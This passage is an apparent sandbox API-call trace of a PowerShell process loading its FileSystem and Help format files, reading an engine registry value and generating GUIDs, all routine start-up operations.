	[0543.400] ReadFile (in: hFile=0x324, lpBuffer=0x2e6b358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b358*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.400] ReadFile (in: hFile=0x324, lpBuffer=0x2e6b358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b358*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.400] ReadFile (in: hFile=0x324, lpBuffer=0x2e6b358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b358*, lpNumberOfBytesRead=0xad2d8*=0x119, lpOverlapped=0x0) returned 1
	[0543.400] ReadFile (in: hFile=0x324, lpBuffer=0x2e6b358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b358*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0543.400] CloseHandle (hObject=0x324) returned 1
	[0543.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0543.401] SetErrorMode (uMode=0x1) returned 0x1
	[0543.401] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad280 | out: lpFileInformation=0xad280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0543.401] SetErrorMode (uMode=0x1) returned 0x1
	[0543.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0543.401] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad368 | out: phkResult=0xad368*=0x324) returned 0x0
	[0543.401] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2ec, lpData=0x0, lpcbData=0xad2e8*=0x0 | out: lpType=0xad2ec*=0x1, lpData=0x0, lpcbData=0xad2e8*=0x56) returned 0x0
	[0543.401] CoTaskMemAlloc (cb=0x5a) returned 0x2560b0
	[0543.401] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2bc, lpData=0x2560b0, lpcbData=0xad2b8*=0x56 | out: lpType=0xad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad2b8*=0x56) returned 0x0
	[0543.401] CoTaskMemFree (pv=0x2560b0) 
	[0543.401] RegCloseKey (hKey=0x324) returned 0x0
	[0543.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0543.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0543.402] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xd582a07d, Data2=0x4698, Data3=0x426c, Data4=([0]=0xa3, [1]=0x2f, [2]=0xea, [3]=0xb6, [4]=0xa7, [5]=0xa1, [6]=0x2f, [7]=0xc5))) returned 0x0
	[0543.403] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xedd4f1a2, Data2=0xfbb2, Data3=0x4bd6, Data4=([0]=0xac, [1]=0x21, [2]=0x28, [3]=0x9d, [4]=0x18, [5]=0x83, [6]=0x7d, [7]=0x36))) returned 0x0
	[0543.403] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x5106b13e, Data2=0xd401, Data3=0x49dd, Data4=([0]=0xb7, [1]=0xb5, [2]=0xe1, [3]=0xdf, [4]=0x78, [5]=0x69, [6]=0xb2, [7]=0x71))) returned 0x0
	[0543.403] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x3f75827b, Data2=0xbdae, Data3=0x4b0c, Data4=([0]=0x9c, [1]=0xf0, [2]=0x14, [3]=0xda, [4]=0x2a, [5]=0xc1, [6]=0xfd, [7]=0xd4))) returned 0x0
	[0543.403] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0543.403] GetFileType (hFile=0x324) returned 0x1
	[0543.403] SetErrorMode (uMode=0x1) returned 0x1
	[0543.403] GetFileType (hFile=0x324) returned 0x1
	[0543.403] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.404] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.404] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.404] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.404] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.404] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.405] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.405] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.406] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.406] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.407] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.407] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.407] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.407] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.408] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.408] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.410] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.411] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.411] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.411] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.412] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.412] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.412] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.413] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.413] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0543.413] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.303] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.303] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.303] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.304] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.304] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.304] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.309] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.309] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.309] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.309] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.310] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.310] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.310] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.311] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.311] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.311] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.311] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.312] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.312] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.312] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.312] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.312] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.313] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.313] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.313] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.313] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.314] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.314] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.314] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.314] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.315] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.315] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.315] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.315] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.315] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.316] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0544.316] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0xf37, lpOverlapped=0x0) returned 1
	[0544.316] ReadFile (in: hFile=0x324, lpBuffer=0x2ec6b97, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec6b97*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0544.316] ReadFile (in: hFile=0x324, lpBuffer=0x2ec74f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2ec74f8*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0544.316] CloseHandle (hObject=0x324) returned 1
	[0544.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0544.317] SetErrorMode (uMode=0x1) returned 0x1
	[0544.317] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad280 | out: lpFileInformation=0xad280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0544.317] SetErrorMode (uMode=0x1) returned 0x1
	[0544.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0544.317] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad368 | out: phkResult=0xad368*=0x324) returned 0x0
	[0544.317] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2ec, lpData=0x0, lpcbData=0xad2e8*=0x0 | out: lpType=0xad2ec*=0x1, lpData=0x0, lpcbData=0xad2e8*=0x56) returned 0x0
	[0544.317] CoTaskMemAlloc (cb=0x5a) returned 0x2560b0
	[0544.317] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2bc, lpData=0x2560b0, lpcbData=0xad2b8*=0x56 | out: lpType=0xad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad2b8*=0x56) returned 0x0
	[0544.318] CoTaskMemFree (pv=0x2560b0) 
	[0544.318] RegCloseKey (hKey=0x324) returned 0x0
	[0544.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0544.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0544.329] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x8a1833f7, Data2=0xa574, Data3=0x4678, Data4=([0]=0xb2, [1]=0x65, [2]=0xe9, [3]=0x90, [4]=0xd6, [5]=0xa8, [6]=0x57, [7]=0xbc))) returned 0x0
